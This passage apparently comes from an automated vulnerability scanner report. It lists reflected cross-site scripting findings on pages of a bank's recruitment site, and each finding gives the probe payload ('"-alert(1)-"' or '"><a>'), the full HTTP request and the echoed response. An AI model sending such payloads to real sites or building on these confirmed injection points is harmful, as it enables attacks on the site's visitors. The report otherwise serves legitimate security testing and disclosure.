The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e10"><a>63ede3a82e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?11e10"><a>63ede3a82e2=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?11e10"><a>63ede3a82e2=1" />
...[SNIP]...

1.10. http://www.mycreditagricole.jobs/ [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the version request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd5c"><a>364e4b69b9d was submitted in the version parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lang=uk&version=Textedbd5c"><a>364e4b69b9d HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?lang=uk&version=Textedbd5c"><a>364e4b69b9d" />
...[SNIP]...

1.11. http://www.mycreditagricole.jobs/ [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac80a"-alert(1)-"c50d6fd9c1c was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?lang=uk&version=Texteac80a"-alert(1)-"c50d6fd9c1c HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:46 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:46 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
= "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?lang=uk&version=Texteac80a"-alert(1)-"c50d6fd9c1c";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http://w
...[SNIP]...

1.12. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_asset_insurance_bank.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28915"-alert(1)-"234f00556cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_asset_insurance_bank.php?28915"-alert(1)-"234f00556cc=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Asset m
...[SNIP]...
et management, insurance and private banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_asset_insurance_bank.php?28915"-alert(1)-"234f00556cc=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.13. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_asset_insurance_bank.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98ed3"><a>087d9a50e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_asset_insurance_bank.php?98ed3"><a>087d9a50e0a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:15 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:15 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Asset m
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_asset_insurance_bank.php?98ed3"><a>087d9a50e0a=1" />
...[SNIP]...

1.14. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_finance_invest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7e63"-alert(1)-"ed1373b3f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_finance_invest.php?c7e63"-alert(1)-"ed1373b3f8e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Financi
...[SNIP]...
aringBaseTitle = "Financing and investment banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_finance_invest.php?c7e63"-alert(1)-"ed1373b3f8e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.15. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_finance_invest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5883"><a>f442009ed5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_finance_invest.php?c5883"><a>f442009ed5a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Financi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_finance_invest.php?c5883"><a>f442009ed5a=1" />
...[SNIP]...

1.16. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_france.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9244"><a>de696e96c49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_retailbank_france.php?a9244"><a>de696e96c49=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Regiona
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_retailbank_france.php?a9244"><a>de696e96c49=1" />
...[SNIP]...

1.17. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_france.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5998b"-alert(1)-"6a38dca8741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_retailbank_france.php?5998b"-alert(1)-"6a38dca8741=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Regiona
...[SNIP]...
gBaseTitle = "Regional retail banking in France - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_retailbank_france.php?5998b"-alert(1)-"6a38dca8741=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.18. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_inter.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c23"><a>8d5b94691b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_retailbank_inter.php?75c23"><a>8d5b94691b0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interna
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_retailbank_inter.php?75c23"><a>8d5b94691b0=1" />
...[SNIP]...

1.19. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_retailbank_inter.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef380"-alert(1)-"b0c2e18007c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_retailbank_inter.php?ef380"-alert(1)-"b0c2e18007c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interna
...[SNIP]...
SharingBaseTitle = "International retail banking - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_retailbank_inter.php?ef380"-alert(1)-"b0c2e18007c=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.20. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_financial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4305a"-alert(1)-"0afbc4dcd29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_special_financial.php?4305a"-alert(1)-"0afbc4dcd29=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
ringBaseTitle = "Specialized financial services - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_special_financial.php?4305a"-alert(1)-"0afbc4dcd29=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.21. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_financial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ce"><a>f6986c5c9a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_special_financial.php?328ce"><a>f6986c5c9a7=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_special_financial.php?328ce"><a>f6986c5c9a7=1" />
...[SNIP]...

1.22. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_subsidiaries.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29887"-alert(1)-"e438a8bc04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_special_subsidiaries.php?29887"-alert(1)-"e438a8bc04=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:56 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:56 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
e = "Specialized activities and subsidiaries - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_special_subsidiaries.php?29887"-alert(1)-"e438a8bc04=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.23. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /acti_special_subsidiaries.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565cf"><a>32b2bec6a15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /acti_special_subsidiaries.php?565cf"><a>32b2bec6a15=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:31 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:31 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Special
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/acti_special_subsidiaries.php?565cf"><a>32b2bec6a15=1" />
...[SNIP]...

1.24. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /acti_support.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b501"-alert(1)-"3a62cc6ae5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acti_support.php?4b501"-alert(1)-"3a62cc6ae5b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Support
...[SNIP]...
itment Group";
var SharingBaseTitle = "Support functions - Activities and careers - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/acti_support.php?4b501"-alert(1)-"3a62cc6ae5b=1";
